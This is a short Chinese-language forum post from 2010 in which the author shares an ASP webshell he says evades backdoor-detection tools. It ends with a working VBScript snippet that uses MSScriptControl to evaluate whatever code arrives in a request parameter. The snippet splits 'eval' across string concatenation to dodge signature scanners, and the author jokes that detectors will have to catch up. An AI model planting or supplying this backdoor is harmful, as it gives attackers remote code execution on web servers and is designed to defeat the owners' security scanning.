|
发表于 2010-1-20 14:51:23
|显示全部楼层
今天在某高手的博客上看到了一个新的绕过那个什么查ASP 马的东西。。
怎么说呢,其实如果单说写文件到服务器上来留后门的话。
可能大概也只有10多种方法吧可以绕过吧。
但是像这种可以直接执行的,好象还少着。。
既然他们都公布得愉快。
我也发一个我觉得拿得出手的吧。
等着那些检测程序加入新的特征吧,啊哈哈。
set sobiny = server.CreateObject("MSScriptControl.ScriptControl.1")
sobiny.Language="VBScript"
sobiny.AddObject "Response", Response
sobiny.AddObject "request", request
sobiny.ExecuteStatement("ev"&"al(request(""aaaa""))")
%> |
|